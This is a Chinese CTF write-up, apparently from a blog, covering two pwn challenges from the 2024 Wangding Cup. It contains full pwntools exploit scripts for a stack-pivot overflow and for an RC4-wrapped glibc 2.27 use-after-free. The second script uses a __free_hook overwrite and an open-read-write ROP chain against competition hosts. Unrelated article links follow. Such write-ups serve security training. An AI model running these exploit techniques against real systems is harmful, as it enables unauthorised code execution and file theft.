pwn2

开局泄露栈地址,又是栈溢出,直接栈转移拿下

from pwn import *

from LibcSearcher import LibcSearcher

#from Crypto.Util.number import bytes_to_long,bytes_to_long

#--------------------setting context---------------------

context.clear(arch='amd64', os='linux', log_level='debug')

li = lambda content,data : print('\x1b[01;38;5;214m' + content + ' = ' + hex(data) + '\x1b[0m')

lg = lambda content : print('\x1b[01;38;5;214m' + content +'\x1b[0m')

sla = lambda data, content: io.sendlineafter(data,content)

sa = lambda data, content: io.sendafter(data,content)

sl = lambda data: io.sendline(data)

rl = lambda data: io.recvuntil(data)

re = lambda data: io.recv(data)

sa = lambda data, content: io.sendafter(data,content)

dbg = lambda    : gdb.attach(io)

bk = lambda : (dbg(),pause())

inter = lambda: io.interactive()

l64 = lambda    :u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))

h64=lambda     :u64(io.recv(6).ljust(8,b'\x00'))

add=0

orw_shellcode = asm(shellcraft.open('flag') + shellcraft.read(3, add, 0x30) + shellcraft.write(1,add, 0x30))

def dbg(c = 0):

    if(c):

        gdb.attach(io, c)

        pause()

    else:

        gdb.attach(io)

        pause()

#---------------------------------------------------------

filename = "./short"

#io = process(filename)

io = remote("0192d60ff4427dff9e9f1e7ecaacbc14.diu4.dg07.ciihw.cn",46513)

elf = ELF(filename)

libc=ELF("/lib/i386-linux-gnu/libc.so.6")

#初始化完成---------------------------------------------------------\

sla(b':',b'admin')

sla(b':',b'admin123')

rl(b'this:')

s=io.recv(11)

print(s)

badd=int(s,16)

print(hex(badd))

backdoor=0x80485ff

#payload=b'/bin/sh\x00'+b'a'*68+b'a'*4+p32(elf.bss()+0x100)+p32(0x8048662)

payload=(p32(backdoor)*2+p32(badd+8+4)+b'/bin/sh\x00').ljust(0x50,b'a')+p32(badd)+p32(0x804860F)

#dbg()

sa(b'plz input your msg:',payload)

inter()

pwn4

开头卡了一个账号密码,是未知的,但根据回显可以判断长度,最后写一个随机字符串爆破算法爆破出来了

2.27的堆题,漏洞点是uaf,但是这个堆题包装了一个rc4加密

rc4本质是就是字符的异或,两次rc4就可以恢复原来的,审计发现,add功能的时候会加密一次,然后show会加密恢复一次,然后show之后再加密,free功能会把内容全加密一次,edit功能也会

因此,我们在free掉之后,在调试中看是没加密的,但是show功能出来的是加密之后的,因此泄露地址的时候接收到的是密文,我们直接rc4一次就可以了,还有后续uaf修改也需要去提前处理

撕开这层包装,后面就是uaf泄露地址然后改freehook然后orw了

exp如下

from pwn import *

#from Crypto.Util.number import bytes_to_long,bytes_to_long

#--------------------setting context---------------------

context.clear(arch='amd64', os='linux', log_level='debug')

li = lambda content,data : print('\x1b[01;38;5;214m' + content + ' = ' + hex(data) + '\x1b[0m')

lg = lambda content : print('\x1b[01;38;5;214m' + content +'\x1b[0m')

sla = lambda data, content: io.sendlineafter(data,content)

sa = lambda data, content: io.sendafter(data,content)

sl = lambda data: io.sendline(data)

rl = lambda data: io.recvuntil(data)

re = lambda data: io.recv(data)

sa = lambda data, content: io.sendafter(data,content)

dbg = lambda    : gdb.attach(io)

bk = lambda : (dbg(),pause())

inter = lambda: io.interactive()

l64 = lambda    :u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))

h64=lambda     :u64(io.recv(6).ljust(8,b'\x00'))

add=0

orw_shellcode = asm(shellcraft.open('flag') + shellcraft.read(3, add, 0x30) + shellcraft.write(1,add, 0x30))

def dbg(c = 0):

    if(c):

        gdb.attach(io, c)

        pause()

    else:

        gdb.attach(io)

        pause()

#---------------------------------------------------------

filename = "./pwn"

#io = process(filename)

io = remote("0192d73de23d7e60b2db8af8f087fcb7.srv9.dg07.ciihw.cn",44909)

#elf = ELF(filename)

libc=ELF("./libc.so.6")

#初始化完成---------------------------------------------------------\

def add(size,index,payload):

	sla(b'>',b'1')

	sla(b':',str(index))

	sla(b':',str(size))

	sa(b':',payload)

def free(index):

	sla(b'>',b'3')

	sla(b':',str(index))

def show(index):

	sla(b'>',b'2')

	sla(b':',str(index))

def edit(index,payload):

	sla(b'>',b'4')

	sla(b':',str(index))

	sa(b':',payload)

#rc4

def KSA(key):

    """ Key-Scheduling Algorithm (KSA) """

    S = list(range(256))

    j = 0

    for i in range(256):

        j = (j + S[i] + key[i % len(key)]) % 256

        S[i], S[j] = S[j], S[i]

    return S

def PRGA(S):

    """ Pseudo-Random Generation Algorithm (PRGA) """

    i, j = 0, 0

    while True:

        i = (i + 1) % 256

        j = (j + S[i]) % 256

        S[i], S[j] = S[j], S[i]

        K = S[(S[i] + S[j]) % 256]

        yield K

def RC4(key, text):

    """ RC4 encryption/decryption """

    S = KSA(key)

    keystream = PRGA(S)

    res = []

    for char in text:

        res.append(char ^ next(keystream))

    return bytes(res)

sla(b'Input your username:',b'4dm1n')

sla(b'Input your password:',b'985da4f8cb37zkj')

for i in range(8):

      add(0x120,i,b'aaaa\n')

add(0x120,8,b'aaaa\n')

for i in range(7):

	free(i)

free(7)

show(7)

#dbg()

#leak libc

rl(b'[key,value] = [7,')

add2=io.recvuntil(b'Encrypt')[0:-9]

print(add2)

key = b's4cur1ty_p4ssw0rd'

ciphertext = RC4(key, add2)

print(ciphertext[0:8])

libcbase=u64(ciphertext[0:8])-0x3ebca0

#add=h64()

lg(hex(libcbase))

#dbg()

#leak heap

show(6)

rl(b'[key,value] = [6,')

add2=io.recvuntil(b'Encrypt')[0:-9]

print(add2)

key = b's4cur1ty_p4ssw0rd'

ciphertext = RC4(key, add2)

print(ciphertext[0:8])

heapbase=u64(ciphertext[0:8])

lg(hex(heapbase))

#hacker free_hook

free_hook=libcbase+libc.sym['__free_hook']

lg(hex(free_hook))

free_hook = f"{free_hook:x}".zfill(16)

free_hook=bytes.fromhex(free_hook)

free_hook=free_hook[::-1]

#setcont=libcbase+libc.sym['setcontent']+61

key = b's4cur1ty_p4ssw0rd'

efree = RC4(key, free_hook)

edit(6,efree+b'\n')

add(0x120,9,b'aaaaa\n')

#dbg()

setcontext=libcbase+libc.sym['setcontext']+53

lg(hex(setcontext))

setcontext = f"{setcontext:x}".zfill(16)

setcontext=bytes.fromhex(setcontext)

setcontext=setcontext[::-1]

efree = RC4(key, setcontext)

add(0x120,0,efree+b'\n')

# 计算 ROP gadgets 和函数地址

pop_rdi = libcbase +0x000000000002164f

pop_rsi = libcbase + 0x0000000000023a6a

pop_rdx = libcbase + 0x0000000000130539

read_addr = libcbase + libc.sym['read']

puts_addr =libcbase+ libc.sym['puts']

open_addr = libcbase+libc.sym['open']

ret=libcbase+0x00000000000008aa

# 构建 ROP 链

orw1 = (

    p64(pop_rdi) + p64(heapbase+0x478) +  # open

    p64(pop_rsi) + p64(0) +

    p64(open_addr)+

    p64(pop_rdi) + p64(3) +  # read

    p64(pop_rsi) + p64(heapbase) +

    p64(pop_rdx) + p64(0x30) + p64(heapbase) +

    p64(read_addr) +

    p64(pop_rdi) + p64(heapbase) +  # puts

    p64(puts_addr)

)

orw1.ljust(0xa8,b'a')

orw1+=p64(heapbase+0x390)*5+p64(ret)*8+b'./flag.txt\x00'

#orw1+=p64(heapbase+0x390)*8+b'flag\x00'

# 转换为字节串并处理

orw=p64(pop_rdi)

orw_hex = orw.hex().zfill(16)  # 直接用 .hex() 方法

orw_bytes = bytes.fromhex(orw_hex)

# 加密

efree = RC4(key, orw_bytes)

orw=p64(pop_rsi)

orw_hex = orw.hex().zfill(16)  # 直接用 .hex() 方法

orw_bytes = bytes.fromhex(orw_hex)

efree += RC4(key, orw_bytes)

edit(8, orw1+b'\n')

#dbg()

free(8)

inter()

好久没搞2.27的orw了,我setcontext还是用的+61的,卡了一下

2024年网鼎杯青龙组 pwn的更多相关文章

  1. 2020网鼎杯 白虎组reverse:hero

    主函数,当bossexist的值不为0时,while循环dround()函数,循环结束输出flag outflag()函数的flag值由6段数据拼凑而成 while循环的dround()函数有三个选择 ...

  2. 网鼎杯玄武组部分web题解

    查看JS,在JS中找到p14.php,直接copy下来console执行,输入战队的token就可以了 js_on 顺手输入一个 admin admin,看到下面的信息 欢迎admin这里是你的信息: ...

  3. 2020年第二届“网鼎杯”网络安全大赛 白虎组 部分题目Writeup

    2020年第二届“网鼎杯”网络安全大赛 白虎组 部分题目Writeup 2020年网鼎杯白虎组赛题.zip下载 https://download.csdn.net/download/jameswhit ...

  4. CTF-i春秋网鼎杯第四场部分writeup

    CTF-i春秋网鼎杯第四场部分writeup 因为我们组的比赛是在第四场,所以前两次都是群里扔过来几道题然后做,也不知道什么原因第三场的题目没人发,所以就没做,昨天打了第四场,简直是被虐着打. she ...

  5. CTF-i春秋网鼎杯第二场misc部分writeup

    CTF-i春秋网鼎杯第二场misc部分writeup 套娃 下载下来是六张图片 直接看并没有什么信息 一个一个查看属性 没有找到有用信息 到winhexv里看一下 都是标准的png图片,而且没有fla ...

  6. CTF-i春秋网鼎杯第一场misc部分writeup

    CTF-i春秋网鼎杯第一场misc部分writeup 最近因为工作原因报名了网鼎杯,被虐了几天后方知自己还是太年轻!分享一下自己的解题经验吧 minified 题目: 一张花屏,png的图片,老方法, ...

  7. 刷题记录:[网鼎杯]Fakebook

    目录 刷题记录:[网鼎杯]Fakebook 一.涉及知识点 1.敏感文件泄露 2.sql注入 二.解题方法 刷题记录:[网鼎杯]Fakebook 题目复现链接:https://buuoj.cn/cha ...

  8. 2020 网鼎杯wp

    2020 网鼎杯WP 又是划水的一天,就只做出来4题,欸,还是太菜,这里就记录一下做出的几题的解题记录 AreUSerialz 知识点:反序列化 打开链接直接给出源码 <?php include ...

  9. [网鼎杯 2018]Comment

    [网鼎杯 2018]Comment 又遇到了一道有意思的题目,还是比较综合的,考的跟之前有一道很相像,用的还是二次注入. 因为找不到登陆点的sql注入,所以扫了一下源码,发现是存在git泄露的. [2 ...

  10. 网鼎杯2020 AreUSerialz

    0x00 前言 ...有一说一,赵总的BUUCTF上的这道题目并没有复现到精髓.其实感觉出题人的题目本身没有那么简单的,只不过非预期实在是太简单惹. 涉及知识点: 1.php中protected变量反 ...

随机推荐

  1. [rCore学习笔记 022]多道程序与分时任务

    写在前面 本随笔是非常菜的菜鸡写的.如有问题请及时提出. 可以联系:1160712160@qq.com GitHhub:https://github.com/WindDevil (目前啥也没有 思考 ...

  2. 基础数据结构->set&&map

    set&&map BEGIN:惜墨如金 set用法 基本用法 #include<bits/stdc++.h> using namespace std; void the_s ...

  3. SMU Autumn 2023 Round 4(Div.1+2)

    SMU Autumn 2023 Round 4(Div.1+2) A. Access Denied 通过分析样例可以得知如果所猜字符串与答案字符串长度不同,则只要\(5ms\),且答案最多\(20\) ...

  4. Win32 SDK(四)Edit控件用法

    Win32 SDK(四)Edit控件用法 1获得控件句柄 HWND hEdit2 = ::GetDlgItem(hWnd, IDC_EDIT2); WINUSERAPI HWND WINAPI Get ...

  5. canfestival源码下载教程

    先进入官网的这个页面 https://canfestival.org/code.html.en 点击箭头所指的地方 选择日期最新的点击下载

  6. JVM学习笔记之栈区

    JVM学习笔记之栈区 本文主要内容: 栈是什么?栈帧又是什么?在JVM中,main方法调用say方法后,是怎么运行的?本文将详细讲解栈.希望大家学了之后,对栈有更深的了解. 心法:在JVM中,栈管运行 ...

  7. 如何高效的阅读paper--三遍阅读法

    第一遍 1.阅读文章的标题.摘要和介绍 2.阅读每一节的标题和副标题 3.阅读总结 4.浏览参考文献,看看是否有曾经读过的文章 在完成第一遍后,应该做到: 1.能够说出该篇论文的类型 2.能够说出文章 ...

  8. Java基础12

    抽象类与抽象方法 abstract : 抽象的 abstract可以用来修饰:类.方法 abstract修饰类 > 此类称为抽象类 > 抽象类不能实例化 > 抽象类中是包含构造器的, ...

  9. Zeppelin 学习

    Zeppelin 遇到的问题: 1. 在interpreter 界面配置 dependency management 了以后,报 Error setting properties for interp ...

  10. 2023/11/16 NOIP 模拟赛

    T1 基于1的算术 标签 暴力枚举 思路1 赛时想了个假的 DP,只拿了 77 分,,, 小于 \(10^{15}\) 的仅由 \(1\) 组成的数只有 \(15\) 个,直接枚举即可. 想了一个做法 ...